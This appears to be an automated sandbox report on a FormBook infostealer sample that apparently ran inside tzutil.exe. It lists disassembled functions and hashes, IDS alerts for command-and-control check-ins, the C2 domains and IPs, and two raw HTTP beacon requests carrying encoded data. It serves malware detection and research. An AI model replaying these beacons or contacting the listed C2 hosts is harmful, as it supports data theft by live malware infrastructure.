___swprintf_l.LIBCMT ref: 03B6293C
___swprintf_l.LIBCMT ref: 03B6295E
___swprintf_l.LIBCMT ref: 03B629A3
___swprintf_l.LIBCMT ref: 03B9A52E

Strings

:%u.%u.%u.%u, xrefs: 03B9A5B8
ffff:, xrefs: 03B9A504
::%hs%u.%u.%u.%u, xrefs: 03B9A527
::ffff:0:%u.%u.%u.%u, xrefs: 03B9A54E

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 4a778ea28937c3bd7a67dd94ec608168005117b2c362fb50f038c964d15cd3af
Instruction ID: 3e3ada927d65353df8e7dbc058b09bdc902950fe984d67ddfd5238942bae8157
Opcode Fuzzy Hash: 4a778ea28937c3bd7a67dd94ec608168005117b2c362fb50f038c964d15cd3af
Instruction Fuzzy Hash: 0051CCB6A001167FEF10DB988C9097EF7B8FF44209B54C5FAE465DB642D238DE508BA0

Function 03BD2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03BD24A6
___swprintf_l.LIBCMT ref: 03BD24E2
___swprintf_l.LIBCMT ref: 03BD257D
___swprintf_l.LIBCMT ref: 03BD25A3
___swprintf_l.LIBCMT ref: 03BD25C8
___swprintf_l.LIBCMT ref: 03BD2608

Strings

ffff:, xrefs: 03BD247D, 03BD249D
:%u.%u.%u.%u, xrefs: 03BD25FF
::%hs%u.%u.%u.%u, xrefs: 03BD249E
::ffff:0:%u.%u.%u.%u, xrefs: 03BD24DA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 5acc7582d330aca7f9e3ee003912e78a88c4d9698fa43fe921d69d7bd138945e
Instruction ID: 6a18611b8aea6c404452b488c9e06508d8c92679ebba113f30d2924733d36a01
Opcode Fuzzy Hash: 5acc7582d330aca7f9e3ee003912e78a88c4d9698fa43fe921d69d7bd138945e
Instruction Fuzzy Hash: 1551F675A00685AECB20DF5CC99097EB7F9EB4420CB4488FAE5A5DB641F774DA408B60

Function 03B57630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03B94742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03B946FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 03B94787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03B94725
Execute=1, xrefs: 03B94713
ExecuteOptions, xrefs: 03B946A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03B94655

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6d21b970a83ff5a9442a8dd9f1cbae732f7f78461e5f895dcc381b8d27739826
Instruction ID: f0f6edbf8c735e1a657b31e9d926a89854617f091bd8fb86f68f0cfd488f0d7e
Opcode Fuzzy Hash: 6d21b970a83ff5a9442a8dd9f1cbae732f7f78461e5f895dcc381b8d27739826
Instruction Fuzzy Hash: E351E935B01319AAEF11EAA9EC86BED77A8EB0430CF0400F9F905AB191DB719E458F51

Function 03BF6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: fc80944984a91b9afc06774fd3f94b589bf9d863833ad65613e99c11878c5bb4
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 0C022775508341AFC705CF18C490B6BBBE5EFC8708F049AADFA994B255DB31E909CB82

Function 03B6B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03B6B6BF

Strings

0, xrefs: 03B6B66F
+, xrefs: 03B6B65A
0, xrefs: 03B6B695
-, xrefs: 03B6B650

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 2f0e63163db708afc05855f3415ec96286f168213e30a677247d22b6ef2adf10
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 4D818D74E452499ADF24CE6AC8917FEFBB6EF45318F1C41FAD861E7392C63898408B50

Function 03BD20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03BD214F
___swprintf_l.LIBCMT ref: 03BD2172

Strings

%%%u, xrefs: 03BD2146
]:%u, xrefs: 03BD2169
[, xrefs: 03BD212B

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 6c3c10ea04e27361fbe42db27b787b5285a06139e9759849ebf36f1ebeb269ce
Instruction ID: 2f45f85235c8b3aa9fbd3c59732df7a7d48c24db53ff76296da24ff6a4c72ca0
Opcode Fuzzy Hash: 6c3c10ea04e27361fbe42db27b787b5285a06139e9759849ebf36f1ebeb269ce
Instruction Fuzzy Hash: BA216576E00259ABDB10DF79CC41AEEB7F8EF44658F4845B6E915EB201F730DA018BA1

Function 03B4F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03B902E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03B902BD
RTL: Re-Waiting, xrefs: 03B9031E

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 6a902b093aa6b05695e0e1cad267f880581eaa26b6e9981c67c35efa2f749ff5
Instruction ID: c7739d645bb78662dc4a4b8a7004103a2af4a49a6890b7c1a4cc3861e0137f1a
Opcode Fuzzy Hash: 6a902b093aa6b05695e0e1cad267f880581eaa26b6e9981c67c35efa2f749ff5
Instruction Fuzzy Hash: 40E1B0306087419FEB25DF28C984B2AB7E4FB49318F180AB9F5A58B2D1D774D944CB46

Function 03B5BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 03B97B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03B97B7F
RTL: Re-Waiting, xrefs: 03B97BAC

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: e1ff56f9704b14b092ba26c8fe8ced8109effdb081f0f66cd923f2a1cb164f8f
Instruction ID: 9beaf4084ceb3331672455ecefec9c34bc2e7544b8e4e498159f45303ae669d6
Opcode Fuzzy Hash: e1ff56f9704b14b092ba26c8fe8ced8109effdb081f0f66cd923f2a1cb164f8f
Instruction Fuzzy Hash: D54124357047029FDB24CE28CC51B6AB7E5EF88718F140ABEF95ADB280DB70E4058B91

Function 03B5B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03B9728C

Strings

RTL: Resource at %p, xrefs: 03B972A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03B97294
RTL: Re-Waiting, xrefs: 03B972C1

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 3a6296f129643d8ce14aade132130cfb31b9e16b98bc4cd9daa67af1782ab392
Instruction ID: 73d21d36c56e2bf8a5299c9097116356b3005f73686328edc3127ca88544600b
Opcode Fuzzy Hash: 3a6296f129643d8ce14aade132130cfb31b9e16b98bc4cd9daa67af1782ab392
Instruction Fuzzy Hash: 7941D035A10706ABDB20CE24CC42B6AB7E5FF85719F1406BAFC55DB240DB21E81287D1

Function 03BD2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03BD238D
___swprintf_l.LIBCMT ref: 03BD23B3

Strings

]:%u, xrefs: 03BD23AA
%%%u, xrefs: 03BD2384

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: fc6950aa627c9557e6b82b85b93c18e102545023ccdfc0aed0b1e355ee4ef608
Instruction ID: 7a22699fb553144426f63bc7c36b5ab9954a98df385d11212861d57101a4a0c5
Opcode Fuzzy Hash: fc6950aa627c9557e6b82b85b93c18e102545023ccdfc0aed0b1e355ee4ef608
Instruction Fuzzy Hash: 85317876A002599FCB20DF29CC40BEEB7F8EF44654F9445E6E859E7240FB309A548FA0

Function 03B67D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03B67E8B

Strings

+, xrefs: 03B67DE8
-, xrefs: 03B67DDD

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: f9627d0390c0ace94bce2cad3bb4228c564269f87b619473538b736d4f1c79ab
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: A891CC70E002599BDF24DE69C892ABEB7A9FF4471CF1845B9E865E72C2DF3C89408750

Function 03B29126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 03B29191
@, xrefs: 03B29175

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 0b9d3551a427b2f8d35f4dfe4d7bef77571e47f402242ae4a00d61c3c92969cf
Instruction ID: 647a97d0c0c8f3a6dc54a4d782d2525bdfba76551e6c7397c49dd31eb3dae2f4
Opcode Fuzzy Hash: 0b9d3551a427b2f8d35f4dfe4d7bef77571e47f402242ae4a00d61c3c92969cf
Instruction Fuzzy Hash: 77810975D002699BDB21DF54CC44BEEB7B8AF09754F0446EAA91DBB280D7709E84CFA0

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 4x nop then jmp 079C88F5h	0_2_079C8B9A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 4x nop then xor eax, eax	6_2_032C9B80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_039904E4

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49811 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49899 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49940 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49914 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 217.160.0.147:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 217.160.0.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 103.144.219.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49927 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50026 -> 107.163.96.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 107.163.96.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 45.197.45.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 217.160.0.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 217.160.0.147:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 45.197.45.172:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 119.28.49.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 47.57.185.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 107.163.96.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50030 -> 45.197.45.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 107.163.96.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 45.197.45.172:80

Source: Joe Sandbox View	IP Address: 162.0.213.94 162.0.213.94
Source: Joe Sandbox View	IP Address: 199.59.243.227 199.59.243.227

Source: Joe Sandbox View	ASN Name: GIGABITBANK-AS-APGigabitbankGlobalHK GIGABITBANK-AS-APGigabitbankGlobalHK
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source:	DNS query: www.personal-loans-jp8.xyz
Source:	DNS query: www.siyue.xyz
Source:	DNS query: www.farukugurluakdogan.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /igto/?-n1P=0hFdS6&1Dd0AZ=8YFnU67lyalxhD6YAq63dHcF/xhcFCtDVk0hyUkc2gzBxzKJj8V8IimbyLXPMQTMLAK7+VkEGKl8Gj8O4yEU/qETkCuAbtbCtj2w9LUvHfPFzdZQ+0e4bLhl1yfV/l2PPQ== HTTP/1.1Host: www.redimpact.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /slxf/?1Dd0AZ=Mb3F8yBS6AlbUJPyZs3X69r2DqN8IvT5IyZZHGmk1vQlgc6dIBTXJS0PrtljhQmz1YN0gN0Ls4vblXiCECQJAAozx7p4dDONpSd/YuBCScUyPep9ny5nGU0OrFlk67uJPQ==&-n1P=0hFdS6 HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
